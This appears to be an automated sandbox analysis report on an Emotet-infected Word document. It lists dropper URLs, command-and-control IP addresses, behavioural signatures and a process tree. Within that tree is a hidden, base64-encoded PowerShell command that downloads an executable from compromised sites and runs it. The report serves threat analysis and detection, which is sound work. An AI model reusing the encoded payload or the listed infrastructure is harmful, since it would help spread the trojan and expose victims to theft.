Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    16-01-2020 17:04

General

  • Target

    bc85a963caeacf32943c486ace740c260a41b6f16d37de840fbd42f30c6e26f3

  • Sample

    200116-1czy1x2rfs

  • SHA256

    bc85a963caeacf32943c486ace740c260a41b6f16d37de840fbd42f30c6e26f3

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://ajhmanamlak.com/wp-content/rcz9/

exe.dropper

http://maphagroup.com/wp-admin/mtq/

exe.dropper

http://www.meggie-jp.com/images/Tznj/

exe.dropper

http://giatlalaocai.com/wp-admin/Yz98SWY6/

exe.dropper

https://www.nnjastudio.com/wp-admin/xHjsw/

Extracted

Family

emotet

C2

68.172.243.146:80

64.40.250.5:80

81.17.92.70:80

91.250.96.22:8080

37.187.72.193:8080

104.131.44.150:8080

167.71.10.37:8080

37.139.21.175:8080

73.11.153.178:8080

192.241.255.77:8080

91.205.215.66:443

201.229.45.222:8080

46.105.131.87:80

188.0.135.237:80

78.142.114.69:80

64.53.242.181:8080

93.147.141.5:443

101.187.134.207:8080

72.189.57.105:80

190.117.126.169:80

rsa_pubkey.plain

Signatures

  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\bc85a963caeacf32943c486ace740c260a41b6f16d37de840fbd42f30c6e26f3.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Enumerates system info in registry
    PID:4880
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABaAGEAeQB1AHgAegBwAHQAawB0AD0AJwBJAHcAcgB1AGcAagB1AGMAYwByAGoAJwA7ACQARABjAGQAeABzAGoAZABuAGIAZQAgAD0AIAAnADcAOQA2ACcAOwAkAFcAbwBmAGIAaAB4AGkAbAA9ACcAWgB0AHgAbwBoAGMAeQBqAHoAcQAnADsAJABJAGIAbAB1AHEAagB4AG4AdgBvAHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEQAYwBkAHgAcwBqAGQAbgBiAGUAKwAnAC4AZQB4AGUAJwA7ACQAUgBpAGgAcgBqAHoAZwBpAHEAZABxAHcAZAA9ACcASgBtAGcAZQB3AGYAaAB2AG4AbABmACcAOwAkAFoAZwBrAHYAaABoAG0AYwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAFQALgBXAEUAQgBjAEwASQBFAG4AVAA7ACQATgB2AGMAdwBvAG4AYwB6AGMAZQB5AGMAbgA9ACcAaAB0AHQAcAA6AC8ALwBhAGoAaABtAGEAbgBhAG0AbABhAGsALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAGMAegA5AC8AKgBoAHQAdABwADoALwAvAG0AYQBwAGgAYQBnAHIAbwB1AHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG0AdABxAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbQBlAGcAZwBpAGUALQBqAHAALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AVAB6AG4AagAvACoAaAB0AHQAcAA6AC8ALwBnAGkAYQB0AGwAYQBsAGEAbwBjAGEAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AWQB6ADkAOABTAFcAWQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBuAG4AagBhAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB4AEgAagBzAHcALwAnAC4AIgBTAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAUwB6AHYAbwBtAGEAdwB3AD0AJwBOAGoAZgBqAHQAdgBjAGIAbABmAG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFUAZgBpAGEAeQBhAG4AeABoAHkAbwB4ACAAaQBuACAAJABOAHYAYwB3AG8AbgBjAHoAYwBlAHkAYwBuACkAewB0AHIAeQB7ACQAWgBnAGsAdgBoAGgAbQBjAC4AIgBEAG8AVwBuAEwAYABPAGAAQQBkAEYASQBsAGUAIgAoACQAVQBmAGkAYQB5AGEAbgB4AGgAeQBvAHgALAAgACQASQBiAGwAdQBxAGoAeABuAHYAbwB4ACkAOwAkAFMAbABzAHEAagBuAHUAZgBkAGUAZgBwAHIAPQAnAEoAYwBlAHIAcAB4AHMAdgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAYgBsAHUAcQBqAHgAbgB2AG8AeAApAC4AIgBMAGUATgBgAGcAVABIACIAIAAtAGcAZQAgADMAMwAxADEAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAQQBgAFIAdAAiACgAJABJAGIAbAB1AHEAagB4AG4AdgBvAHgAKQA7ACQAWgBrAGsAdQBwAG0AZABjAGMAYwB1AD0AJwBJAHoAagBrAGYAegB0AGMAbgBhAHIAJwA7AGIAcgBlAGEAawA7ACQAVwB6AGEAYQBxAGIAdQB1AD0AJwBWAGkAbwB0AGwAbwBmAHoAcABzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAbgBpAHEAcgBjAG0AbABqAD0AJwBPAHAAZQBjAGMAbABzAHAAcwB1ACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4004
    • C:\Users\Admin\796.exe
      "C:\Users\Admin\796.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:4544
      • C:\Users\Admin\796.exe
        --52ac7a52
        3⤵
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:4608

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\796.exe

  • C:\Users\Admin\796.exe

  • C:\Users\Admin\796.exe

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

  • memory/4544-6-0x0000000002280000-0x0000000002297000-memory.dmp

    Filesize

    92KB

  • memory/4608-9-0x0000000000880000-0x0000000000897000-memory.dmp

    Filesize

    92KB

  • memory/4608-10-0x0000000000400000-0x0000000000489000-memory.dmp

    Filesize

    548KB